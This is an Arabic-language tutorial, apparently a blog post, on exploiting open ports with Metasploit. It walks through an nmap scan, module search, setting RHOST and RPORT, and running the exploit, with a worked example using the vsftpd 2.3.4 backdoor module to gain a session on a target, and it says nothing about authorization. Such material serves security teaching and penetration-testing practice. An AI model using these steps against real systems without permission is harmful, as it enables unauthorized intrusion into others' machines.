🛡️ كيفية استغلال البورتات المفتوحة باستخدام Metasploit 🧑🏻‍💻..

 

🛡️ كيفية استغلال البورتات المفتوحة باستخدام Metasploit 🧑🏻‍💻..

يتطلب معرفة بأساسيات الأمان السيبراني، بالإضافة إلى معرفة كيفية استخدام الأدوات بشكل فعال. سأقوم بشرح الخطوات الأساسية لذلك مع مثال عملي.

### الخطوات الأساسية لاستغلال البورتات المفتوحة باستخدام Metasploit:

1. جمع المعلومات:
– قبل أي شيء، يجب عليك جمع المعلومات عن الهدف. يمكنك استخدام أدوات مثل

nmap

لفحص الشبكة والعثور على البورتات المفتوحة.
– مثال:

     nmap -sS -p- <target_ip>

2. فتح Metasploit:
– بعد جمع المعلومات، افتح Metasploit باستخدام الأمر:

     msfconsole

3. البحث عن الاستغلال المناسب:
– ابحث عن الاستغلال المناسب للبورت المفتوح الذي تم اكتشافه. يمكنك استخدام الأمر:

     search <service_name>

– على سبيل المثال، إذا كان هناك بورت مفتوح لخدمة

FTP

، يمكنك البحث عن استغلالات تتعلق بـ

FTP

.

4. اختيار الاستغلال:
– بعد العثور على الاستغلال المناسب، قم بتحميله باستخدام الأمر:

     use <exploit_path>

5. تكوين الخيارات:
– بعد تحميل الاستغلال، يجب عليك تكوين الخيارات اللازمة مثل عنوان IP الهدف والبورت المفتوح. يمكنك استخدام الأمر:

     show options

– ثم قم بتحديد الخيارات المطلوبة باستخدام الأمر:

     set RHOST <target_ip>
     set RPORT <target_port>

6. تشغيل الاستغلال:
– بعد تكوين الخيارات، يمكنك تشغيل الاستغلال باستخدام الأمر:

     exploit

### مثال عملي:

لنفترض أن لدينا خادم FTP يعمل على البورت 21، ونريد استخدام Metasploit لاستغلال ثغرة معروفة.

1. جمع المعلومات باستخدام nmap:

   nmap -sS -p 21 <target_ip>

2. فتح Metasploit:

   msfconsole

3. البحث عن استغلالات FTP:

   search ftp

4. اختيار استغلال:
لنفترض أننا وجدنا استغلالاً يسمى

exploit/unix/ftp/vsftpd_234_backdoor

(ثغرة معروفة في vsftpd).

   use exploit/unix/ftp/vsftpd_234_backdoor

5. تكوين الخيارات:

   set RHOST <target_ip>
   set RPORT 21

6. تشغيل الاستغلال:

   exploit

بعد تشغيل الاستغلال، إذا كانت العملية ناجحة، ستحصل على جلسة مع النظام المستهدف.

 

Scroll to Top